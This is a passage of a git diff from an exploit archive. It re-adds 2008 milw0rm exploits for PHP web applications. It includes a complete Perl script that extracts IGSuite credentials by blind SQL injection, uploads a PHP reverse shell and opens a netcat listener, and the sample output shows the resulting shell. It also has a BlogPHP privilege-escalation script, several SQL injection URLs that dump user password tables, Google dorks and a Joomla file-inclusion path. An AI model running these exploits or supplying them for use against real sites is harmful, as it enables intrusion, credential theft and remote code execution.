-print "[*] Abusing blind SQL injection:   ";
-$|=1;
-while(1)
-{
-	for my $char( @chars )
-	{
-		if( defined( my $found = check_char( $count, $char ) ) )
-		{
-			if( $found eq '' )
-			{
-				upload_shell( split( '=', $string ) );
-				exit;
-			}
-			$string .= $found;
-			$count++;
-			last;
-		}
-	}
-}
-
-sub upload_shell
-{
-	my ($username, $password) = @_;
-
-	print "[*] Logging in with username `$username', password `$password'...\n";
-	do_login( $username, $password );
-
-
-	print "[*] Uploading shell..\n";
-	my $formid = get_formid( $ua->get( "$igurl/filemanager?action=uploadfile&dir=/Home/$username&repid=&repapp=&order=nome" )->content );
-	my $res = $ua->post(	"$igurl/filemanager",
-				Content_Type	=> 'multipart/form-data',
-				Content		=> [
-						formid		=> [undef, undef, Content => $formid],
-						upfile		=> [undef, ($evilfile =~ m/.+\/(.+)/g)[0], Content => slurp($evilfile)],
-						newfilename	=> [undef, undef, Content => $evilfile],
-						submit8		=> [undef, undef, Content => 'Conferma'],
-						]
-				);
-
-
-	if(qx(which nc 2>&1) !~ /^which:/)
-	{
-		print "[*] Requesting $igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . " now, shell will spawn here...\n";
-
-		my $pid = fork();
-		if($pid)
-		{
-			sleep 2;
-			my $res = $ua->get ( "http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] );
-
-			if(!$res->is_success && $res->status_line() !~ /^500 .*timeout/)
-			{
-				print "\n[W] Unexpected status code received -> " . $res->status_line . "\n";
-			}
-
-			waitpid($pid, 0); 
-		}
-		else
-		{
-			exec("`which nc` -v -l -p $rport");
-		}
-	}
-	else
-	{
-		print "[W] Can't find netcat!\n";
-		print "[*] File uploaded on http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . ", start your listener on port $rport and wget it\n";
-	}
-}
-
-sub do_login
-{
-	my ($username, $password) = @_;
-	
-	my $formid = get_formid($ua->get( "$igurl/igsuite" )->content);
-
-	my $res = $ua->post( "$igurl/igsuite", 
-				{
-					formid	=> $formid,
-					login	=> $username,
-					pwd	=> $password,
-					submit5	=> 'Accedi',
-				});
-	die( "Can't login\n" )
-		if( $res->content !~ /this application need a browser that support multi frame/ );
-
-	# lies
-	print "[I] Logged in!\n";
-
-	return $formid;
-}
-
-sub get_formid
-{
-	my ($content) = @_;
-
-	die( "Can't find formid value\n" )
-		 unless $content =~ /name="formid"\s+value="(.+?)"/;
-
-	print "[I] Found `formid' -> $1\n";
-
-	return $1;
-}
-
-sub slurp
-{
-	return do { 
-			open(my $f, "<$_[0]") or die("opening `$_[0]': $!"); 
-			local $/; 
-			my $s=<$f>; 
-			close $f;  
-			$s 
-		};
-}
-
-sub check_char
-{
-	my ($count, $char) = @_;
-
-	my $res = $ua->post( "$igurl/igsuite",
-				{
-					formid =>	"1' OR (SELECT ".
-							"MID(CONCAT(`login`, 0x3d, `passwd`), $count, 1) ".
-							"FROM `users` LIMIT 0,1) = '$char",	
-				});
-	die ("Error: " . $res->status_line . "\n") unless ( $res->is_success );
-
-	if($res->content =~ /IGSuite Error/)
-	{
-		print "\b$char";
-		return undef;
-	}
-	elsif($res->status_line =~ /^(2\d+|3\d+)/)
-	{
-		print "\b$char  ";
-		print "\n" if ($char eq '');
-		return $char;
-	}
-	else
-	{
-		print "\n[!] " . $res->status_line . ":\n########\n\n" . $res->content . "\n########\n\n";
-		die("[!] Failed, check cgi/docroot path.");
-	}
-}
-
-sub usage
-{
-	die < 12141384631aX7I
+# [I] Logged in!
+# [*] Uploading shell..
+# [I] Found `formid' -> 1214138463vOl5x
+# [*] Requesting //Home/ksose/php-reverse-shell.php now, shell will spawn here...
+# listening on [any] 1234 ...
+# connect to [127.0.0.1] from localhost [127.0.0.1] 44758
+# Linux cohelet 2.6.25-gentoo-r5 #1 SMP PREEMPT Sat Jun 21 11:32:15 CEST 2008 i686 Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz GenuineIntel GNU/Linux
+#  14:41:05 up 1 day,  2:52,  1 user,  load average: 0.51, 0.34, 0.52
+#  USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
+#  root     tty1      Sat11   21:33m  0.84s  0.02s /bin/login --
+#  uid=81(apache) gid=81(apache) groups=81(apache)
+#  sh: no job control in this shell
+#  sh-3.2$
+
+use warnings;
+use strict;
+
+print "IGSploit 0.1 - k`sOSe\n\n";
+usage() unless(@ARGV>2);
+
+
+use POSIX;
+use LWP::UserAgent;
+use HTTP::Cookies;
+
+my $ighost	= $ARGV[0];
+my $igcgi	= $ARGV[1];
+my $igpath	= $ARGV[2];
+my $evilfile	= $ARGV[3];
+my $rport	= $ARGV[4];
+my $igurl	= 'http://' . $ighost . $igcgi;
+my @chars	= ( '', '=', 'a'..'z', 0..9, 'A'..'Z', '-', '_', '@', ';', ':', ',', '.', ')' ,'(', '&', '/', '%', '$' );
+
+my $count	= 1;
+my $string	= '';
+
+my $ua = LWP::UserAgent->new;  $ua->agent( "Mozilla/5.0" );
+$ua->cookie_jar( HTTP::Cookies->new( ) );
+$ua->timeout(5);
+
+
+
+print "[*] Abusing blind SQL injection:   ";
+$|=1;
+while(1)
+{
+	for my $char( @chars )
+	{
+		if( defined( my $found = check_char( $count, $char ) ) )
+		{
+			if( $found eq '' )
+			{
+				upload_shell( split( '=', $string ) );
+				exit;
+			}
+			$string .= $found;
+			$count++;
+			last;
+		}
+	}
+}
+
+sub upload_shell
+{
+	my ($username, $password) = @_;
+
+	print "[*] Logging in with username `$username', password `$password'...\n";
+	do_login( $username, $password );
+
+
+	print "[*] Uploading shell..\n";
+	my $formid = get_formid( $ua->get( "$igurl/filemanager?action=uploadfile&dir=/Home/$username&repid=&repapp=&order=nome" )->content );
+	my $res = $ua->post(	"$igurl/filemanager",
+				Content_Type	=> 'multipart/form-data',
+				Content		=> [
+						formid		=> [undef, undef, Content => $formid],
+						upfile		=> [undef, ($evilfile =~ m/.+\/(.+)/g)[0], Content => slurp($evilfile)],
+						newfilename	=> [undef, undef, Content => $evilfile],
+						submit8		=> [undef, undef, Content => 'Conferma'],
+						]
+				);
+
+
+	if(qx(which nc 2>&1) !~ /^which:/)
+	{
+		print "[*] Requesting $igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . " now, shell will spawn here...\n";
+
+		my $pid = fork();
+		if($pid)
+		{
+			sleep 2;
+			my $res = $ua->get ( "http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] );
+
+			if(!$res->is_success && $res->status_line() !~ /^500 .*timeout/)
+			{
+				print "\n[W] Unexpected status code received -> " . $res->status_line . "\n";
+			}
+
+			waitpid($pid, 0); 
+		}
+		else
+		{
+			exec("`which nc` -v -l -p $rport");
+		}
+	}
+	else
+	{
+		print "[W] Can't find netcat!\n";
+		print "[*] File uploaded on http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . ", start your listener on port $rport and wget it\n";
+	}
+}
+
+sub do_login
+{
+	my ($username, $password) = @_;
+	
+	my $formid = get_formid($ua->get( "$igurl/igsuite" )->content);
+
+	my $res = $ua->post( "$igurl/igsuite", 
+				{
+					formid	=> $formid,
+					login	=> $username,
+					pwd	=> $password,
+					submit5	=> 'Accedi',
+				});
+	die( "Can't login\n" )
+		if( $res->content !~ /this application need a browser that support multi frame/ );
+
+	# lies
+	print "[I] Logged in!\n";
+
+	return $formid;
+}
+
+sub get_formid
+{
+	my ($content) = @_;
+
+	die( "Can't find formid value\n" )
+		 unless $content =~ /name="formid"\s+value="(.+?)"/;
+
+	print "[I] Found `formid' -> $1\n";
+
+	return $1;
+}
+
+sub slurp
+{
+	return do { 
+			open(my $f, "<$_[0]") or die("opening `$_[0]': $!"); 
+			local $/; 
+			my $s=<$f>; 
+			close $f;  
+			$s 
+		};
+}
+
+sub check_char
+{
+	my ($count, $char) = @_;
+
+	my $res = $ua->post( "$igurl/igsuite",
+				{
+					formid =>	"1' OR (SELECT ".
+							"MID(CONCAT(`login`, 0x3d, `passwd`), $count, 1) ".
+							"FROM `users` LIMIT 0,1) = '$char",	
+				});
+	die ("Error: " . $res->status_line . "\n") unless ( $res->is_success );
+
+	if($res->content =~ /IGSuite Error/)
+	{
+		print "\b$char";
+		return undef;
+	}
+	elsif($res->status_line =~ /^(2\d+|3\d+)/)
+	{
+		print "\b$char  ";
+		print "\n" if ($char eq '');
+		return $char;
+	}
+	else
+	{
+		print "\n[!] " . $res->status_line . ":\n########\n\n" . $res->content . "\n########\n\n";
+		die("[!] Failed, check cgi/docroot path.");
+	}
+}
+
+sub usage
+{
+	die <   
-
-system('cls');
-#system('clear');
-
-use LWP::UserAgent;
-use HTTP::Request::Common;
-
-$site = $ARGV[0];
-$user = $ARGV[1];
-$pass = $ARGV[2];
-$mail = $ARGV[3];
-
- print " -------------------------------------------------\n";
- print " BlogPHP 2.0 Remote Privilege Escalation Exploit  \n";
- print " Powered by Cod3rZ                                \n";
- print " http://cod3rz.helloweb.eu                        \n";
- print " -------------------------------------------------\n";
-
-sub usage {
-	print " Usage: perl bp.pl        \n";
-	print " -------------------------------------------------\n";
-}
- if(!$mail) { &usage; }
- else {	
-	if ($site !~ /http:\/\//) { $site = "http://".$site; }
-
-	print " Site: $site                                      \n";
-	print " User: $user                                      \n";
-	print " Pass: $pass                                      \n";
-	print " Mail: $mail                                      \n";
-	print " -------------------------------------------------\n";
-	print " Please Wait                                      \n";
-	print " -------------------------------------------------\n";
-
-	$ua = LWP::UserAgent->new;
-	 $lwp = $ua->request(POST $site.'index.php?act=register2', 
-	  [ username => $user, password => $pass, email    => $mail."','Admin','','','','','','','','','','','','')/*" ]);
-	
-	if($lwp->content =~ /Your now registered and logged in/) {
-		print " Done. Now you're admin                           \n";
-		print " -------------------------------------------------\n";
-	}
-	else {
-		print " Failed.                                          \n";
-		print " -------------------------------------------------\n";
-	}
-
-}
-
-# milw0rm.com [2008-06-23]
+#!/usr/bin/perl
+# BlogPHP 2.0 Remote Privilege Escalation Exploit
+# Author : Cod3rZ
+# Site   : http://cod3rz.helloweb.eu
+# Site   : http://devilsnight.altervista.org
+# Cuz We Back Rude This Time
+#
+# Privilege Escalation
+# Send a request to http://127.0.0.1/BlogPHPv2/index.php?act=register2 with:
+# username=[yourusername]&password=[yourpass]&email=[yourmail]','Admin','','','','','','','','','','','','')/*
+#
+# There are other bugs, find them yourself
+#
+# Usage: perl bp.pl    
+
+system('cls');
+#system('clear');
+
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+$site = $ARGV[0];
+$user = $ARGV[1];
+$pass = $ARGV[2];
+$mail = $ARGV[3];
+
+ print " -------------------------------------------------\n";
+ print " BlogPHP 2.0 Remote Privilege Escalation Exploit  \n";
+ print " Powered by Cod3rZ                                \n";
+ print " http://cod3rz.helloweb.eu                        \n";
+ print " -------------------------------------------------\n";
+
+sub usage {
+	print " Usage: perl bp.pl        \n";
+	print " -------------------------------------------------\n";
+}
+ if(!$mail) { &usage; }
+ else {	
+	if ($site !~ /http:\/\//) { $site = "http://".$site; }
+
+	print " Site: $site                                      \n";
+	print " User: $user                                      \n";
+	print " Pass: $pass                                      \n";
+	print " Mail: $mail                                      \n";
+	print " -------------------------------------------------\n";
+	print " Please Wait                                      \n";
+	print " -------------------------------------------------\n";
+
+	$ua = LWP::UserAgent->new;
+	 $lwp = $ua->request(POST $site.'index.php?act=register2', 
+	  [ username => $user, password => $pass, email    => $mail."','Admin','','','','','','','','','','','','')/*" ]);
+	
+	if($lwp->content =~ /Your now registered and logged in/) {
+		print " Done. Now you're admin                           \n";
+		print " -------------------------------------------------\n";
+	}
+	else {
+		print " Failed.                                          \n";
+		print " -------------------------------------------------\n";
+	}
+
+}
+
+# milw0rm.com [2008-06-23]
diff --git a/platforms/php/webapps/5910.txt b/platforms/php/webapps/5910.txt
index 6ea92fc70..892bb8884 100755
--- a/platforms/php/webapps/5910.txt
+++ b/platforms/php/webapps/5910.txt
@@ -1,49 +1,49 @@
-#########################################################################
-#################### Viva IslaM Viva IslaM ##############################
-##
-## Remote SQL Injection Vulnerability
-##
-## Ready2Edit ( pages.php menuid )
-##
-#########################################################################
-#########################################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
-##
-## Em@il  : SQL@Hotmail.it
-##
-## !! SYRIAN HaCkErS  !!
-########################
-########################
-##
-## Script  : Ready2Edit
-##
-## site    : www.skylinewebnapps.com
-##
-########################
-########################
-##
-##  -(:: SQL ::)-
-##
-##    www.site.com/
-##            pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/*
-##
-##  -(:: L!VE DeMo ::)-
-##
-##    http://demo.skylinewebnapps.com/Ready2Edit/pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/*
-##
-#######################
-#######################
-
-#######################################################################################################
-#######################################################################################################
-
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-06-23]
+#########################################################################
+#################### Viva IslaM Viva IslaM ##############################
+##
+## Remote SQL Injection Vulnerability
+##
+## Ready2Edit ( pages.php menuid )
+##
+#########################################################################
+#########################################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
+##
+## Em@il  : SQL@Hotmail.it
+##
+## !! SYRIAN HaCkErS  !!
+########################
+########################
+##
+## Script  : Ready2Edit
+##
+## site    : www.skylinewebnapps.com
+##
+########################
+########################
+##
+##  -(:: SQL ::)-
+##
+##    www.site.com/
+##            pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/*
+##
+##  -(:: L!VE DeMo ::)-
+##
+##    http://demo.skylinewebnapps.com/Ready2Edit/pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/*
+##
+#######################
+#######################
+
+#######################################################################################################
+#######################################################################################################
+
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-06-23]
diff --git a/platforms/php/webapps/5911.txt b/platforms/php/webapps/5911.txt
index 3be1fe5d9..5de88032b 100755
--- a/platforms/php/webapps/5911.txt
+++ b/platforms/php/webapps/5911.txt
@@ -1,38 +1,38 @@
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ################################################################
- #    [ researchguide ]   Remote SQL Injection Vulnerability    #
- ################################################################
- #
- # Script site: http://researchguide.sourceforge.net/
- # 		http://sourceforge.net/projects/researchguide/
- #
- #
- # Vuln: http://site.com/guide/guide.php?id=-1+UNION+SELECT+1,2,concat_ws(char(58),id,name,uniqname,email),4,5,6,7,8,9%20from%20selector/*
- # 
- #
- # Bug:
- #
- # ...
- # $query = "SELECT * FROM $guideTable WHERE id=$id";
- #
- # $result = mysql_query ($query)
- #    or die ('The query failed!');
- # ...
- #
- ########################################################
- # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..  #
- ########################################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-06-23]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ################################################################
+ #    [ researchguide ]   Remote SQL Injection Vulnerability    #
+ ################################################################
+ #
+ # Script site: http://researchguide.sourceforge.net/
+ # 		http://sourceforge.net/projects/researchguide/
+ #
+ #
+ # Vuln: http://site.com/guide/guide.php?id=-1+UNION+SELECT+1,2,concat_ws(char(58),id,name,uniqname,email),4,5,6,7,8,9%20from%20selector/*
+ # 
+ #
+ # Bug:
+ #
+ # ...
+ # $query = "SELECT * FROM $guideTable WHERE id=$id";
+ #
+ # $result = mysql_query ($query)
+ #    or die ('The query failed!');
+ # ...
+ #
+ ########################################################
+ # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..  #
+ ########################################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-06-23]
diff --git a/platforms/php/webapps/5913.txt b/platforms/php/webapps/5913.txt
index bb8b6a15e..7e205f4d0 100755
--- a/platforms/php/webapps/5913.txt
+++ b/platforms/php/webapps/5913.txt
@@ -1,67 +1,67 @@
-=====================================================================================
-  MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Multiple Remote Vulnerabilities
-=====================================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 23 June 2008
-SITE   : www.citec.us
-
-
-#####################################################
- APPLICATION : MyBlog: PHP and MySQL Blog/CMS software
- DOWNLOAD    : http://downloads.sourceforge.net/myblog
-#####################################################
-
---- Remote SQL Injection ---
-
-** Magic Quote must turn off **
-
-----------
- Exploits
-----------
-
-[+] http://[Target]/os/index.php?view=[SQL Injection]
-[+] http://[Target]/os/member.php?id=[SQL Injection]
-[+] http://[Target]/os/post.php?id=[SQL Injection]
-
-   **This exploits can get username and password (No Encryption)**
-
---------------
- POC Exploits
---------------
-
-[+] http://192.168.24.25/os/index.php?view=cwh'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1
-[+] http://192.168.24.25/os/member.php?id=-9999'/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,email,5,6,7,8,9,10/**/FROM/**/myblog_users/**/WHERE/**/perm='1
-[+] http://192.168.24.25/os/post.php?id=-9999'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1
-
-
-
---- Remote XSS ---
-
-----------
- Exploits
-----------
-
-[+] http://[Target]/os/index.php?s=[XSS]
-[+] http://[Target]/os/index.php?sort=[XSS]
-[+] http://[Target]/os/post.php?id=[XSS]
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-23]
+=====================================================================================
+  MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Multiple Remote Vulnerabilities
+=====================================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 23 June 2008
+SITE   : www.citec.us
+
+
+#####################################################
+ APPLICATION : MyBlog: PHP and MySQL Blog/CMS software
+ DOWNLOAD    : http://downloads.sourceforge.net/myblog
+#####################################################
+
+--- Remote SQL Injection ---
+
+** Magic Quote must turn off **
+
+----------
+ Exploits
+----------
+
+[+] http://[Target]/os/index.php?view=[SQL Injection]
+[+] http://[Target]/os/member.php?id=[SQL Injection]
+[+] http://[Target]/os/post.php?id=[SQL Injection]
+
+   **This exploits can get username and password (No Encryption)**
+
+--------------
+ POC Exploits
+--------------
+
+[+] http://192.168.24.25/os/index.php?view=cwh'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1
+[+] http://192.168.24.25/os/member.php?id=-9999'/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,email,5,6,7,8,9,10/**/FROM/**/myblog_users/**/WHERE/**/perm='1
+[+] http://192.168.24.25/os/post.php?id=-9999'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1
+
+
+
+--- Remote XSS ---
+
+----------
+ Exploits
+----------
+
+[+] http://[Target]/os/index.php?s=[XSS]
+[+] http://[Target]/os/index.php?sort=[XSS]
+[+] http://[Target]/os/post.php?id=[XSS]
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-23]
diff --git a/platforms/php/webapps/5914.txt b/platforms/php/webapps/5914.txt
index 32429a965..d595ae360 100755
--- a/platforms/php/webapps/5914.txt
+++ b/platforms/php/webapps/5914.txt
@@ -1,67 +1,67 @@
-===============================================================
-  Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
-===============================================================
- 
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 23 June 2008
-SITE   : www.citec.us
-
-
-#####################################################
- APPLICATION : Demo4 CMS 
- VERSION     : Beta01
- VENDOR      : N/A
- DOWNLOAD    : http://downloads.sourceforge.net/demo4
-#####################################################
-
---- Remote SQL Injection ---
-
------------------------------
- Vulnerable File [index.php]
------------------------------
-
-@Line
-
-   8:  if ($_GET['id']=="")
-   9:  $id = $startpage;
-  10:  else
-  11:  $id = $_GET['id'];
-  12:  database_connect();
-  13:  $query = "SELECT * from content
-  14:         WHERE id = $id";
-  15:  $error = mysql_error();
-
----------
- Exploit
----------
-
-[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]
-
-
-   **This exploits can get username and password (No Encryption)**
-
--------------
- POC Exploit
--------------
-
-[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-23]
+===============================================================
+  Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
+===============================================================
+ 
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 23 June 2008
+SITE   : www.citec.us
+
+
+#####################################################
+ APPLICATION : Demo4 CMS 
+ VERSION     : Beta01
+ VENDOR      : N/A
+ DOWNLOAD    : http://downloads.sourceforge.net/demo4
+#####################################################
+
+--- Remote SQL Injection ---
+
+-----------------------------
+ Vulnerable File [index.php]
+-----------------------------
+
+@Line
+
+   8:  if ($_GET['id']=="")
+   9:  $id = $startpage;
+  10:  else
+  11:  $id = $_GET['id'];
+  12:  database_connect();
+  13:  $query = "SELECT * from content
+  14:         WHERE id = $id";
+  15:  $error = mysql_error();
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]
+
+
+   **This exploits can get username and password (No Encryption)**
+
+-------------
+ POC Exploit
+-------------
+
+[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-23]
diff --git a/platforms/php/webapps/5915.txt b/platforms/php/webapps/5915.txt
index 473bcaac4..a33d4234a 100755
--- a/platforms/php/webapps/5915.txt
+++ b/platforms/php/webapps/5915.txt
@@ -1,29 +1,29 @@
-Title: Joomla Component Com_Facileforms
-
-================================================================
-
-[+] Author : Dr.Kacak
-[+] Special Thankz : KnocKout and all my friends
-[+] System 0VerfL0verZ
-
-=================================================================
-
-Script : Joomla
-
-Google Dork : index.php?option=com_facileforms
-
-Error Code : facileforms.frame.php?ff_compath=
-
-Bug Fix Advice : Undefined değerler, tanımlanmalıdır.
-
-###############################################################
-
-< -- bug code start -- >
-
-www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
-
-/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
-
-< -- bug code end of -- >
-
-# milw0rm.com [2008-06-23]
+Title: Joomla Component Com_Facileforms
+
+================================================================
+
+[+] Author : Dr.Kacak
+[+] Special Thankz : KnocKout and all my friends
+[+] System 0VerfL0verZ
+
+=================================================================
+
+Script : Joomla
+
+Google Dork : index.php?option=com_facileforms
+
+Error Code : facileforms.frame.php?ff_compath=
+
+Bug Fix Advice : Undefined değerler, tanımlanmalıdır.
+
+###############################################################
+
+< -- bug code start -- >
+
+www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
+
+/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
+
+< -- bug code end of -- >
+
+# milw0rm.com [2008-06-23]
diff --git a/platforms/php/webapps/5924.txt b/platforms/php/webapps/5924.txt
index 8430d2874..5f4abba8e 100755
--- a/platforms/php/webapps/5924.txt
+++ b/platforms/php/webapps/5924.txt
@@ -1,100 +1,100 @@
-____________________   ___ ___ ________
-\_   _____/\_   ___ \ /   |   \\_____  \  
- |    __)_ /    \  \//    ~    \/   |   \ 
- |        \\     \___\    Y    /    |    \
-/_______  / \______  /\___|_  /\_______  /
-        \/         \/       \/         \/ 
-
-                                        .OR.ID
-ECHO_ADV_99$2008
-
------------------------------------------------------------------------------------------
-[ECHO_ADV_99$2008] Relative Real Estate Systems <= 3.0 (listing_id) Sql Injection Vulnerability
------------------------------------------------------------------------------------------
-
-Author       : M.Hasran Addahroni
-Date         : June, 24 th 2008
-Location     : Jakarta, Indonesia
-Web          : http://e-rdc.org/v1/news.php?readmore=101
-Critical Lvl : Medium
-Impact       : System access
-Where        : From Remote
----------------------------------------------------------------------------
-
-Affected software description:
-~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Application : Relative Real Estate Systems
-version     : <= 3.0
-Vendor      : http://www.dboorn.com/estate/
-Description :
-
-Elegant real estate script that allows for unlimited listings and agents with featured listings, 
-unlimited photos, advanced search engine, user login option, user tracking, dynamic slide shows,
-Mls/Idx support, multiple agents with photo, mortgage calculator, schools info, C.M.A. 
-request form, full admin panel.Requires PHP/Mysql Windows Server or any Web server with php support.
-
----------------------------------------------------------------------------
-
-Vulnerability:
-~~~~~~~~~~~~~
-
-Input passed to the "listing_id" parameter in index.php is not properly verified before being used 
-in an sql query.
-This can be exploited thru the browser to manipulate SQL queries and pull the username and password from realtors 
-and users in plain text.
-Successful exploitation requires that "magic_quotes" is off.
-
-
-Poc/Exploit:
-~~~~~~~~~
-
-http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(id,0x3a,username,0x3a,password,0x3a,email),0,1,2,3,4,5,6,7,8,9,0,1%20from%20realtors--
-
-http://[URL]/[path]/index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(username,0x3a,password),0,1,2,3,4,5,6,7,8,9,0,1%20from%20users--
-
-Admin Login at http://[URL]/[PATH]/Admin/login_index.php
-
-Dork:
-~~~~
-Google : "index.php?go=listings&listing"
-
-
-Solution:
-~~~~~~
-
-- Edit the source code to ensure that input is properly verified.
-- Turn on magic_quotes in php.ini
-
-
-Timeline:
-~~~~~~~~
-
-- 24 - 06 - 2008 bug found
-- 24 - 06 - 2008 vendor contacted
-- 24 - 06 - 2008 advisory released
----------------------------------------------------------------------------
-
-Shoutz:
-~~~~
-~ ping - my dearest wife, zautha - my little warrior
-~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
-the_hydra,neng chika, str0ke
-~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
-~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
-super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
-~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
-kuntua, stev_manado,nofry,k1tk4t,0pt1c
-~ newbie_hacker@yahoogroups.com
